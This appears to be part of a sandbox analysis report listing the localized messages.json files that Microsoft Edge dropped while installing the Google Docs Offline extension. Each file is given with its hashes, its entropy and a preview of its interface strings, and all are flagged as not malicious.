                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                        MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                        SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                        SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                        SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3107
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                        MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                        SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                        SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                        SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1389
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                        MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                        SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                        SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                        SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1763
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                        MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                        SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                        SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                        SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):930
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                        MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                        SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                        SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                        SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):913
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                        MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                        SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                        SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                        SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):806
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                        MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                        SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                        SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                        SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):883
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                        MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                        SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                        SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                        SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1031
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                        MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                        SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                        SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                        SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1613
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                        MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                        SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                        SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                        SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):848
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                        MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                        SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                        SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                        SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1425
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                        MD5:578215FBB8C12CB7E6CD73FBD16EC994
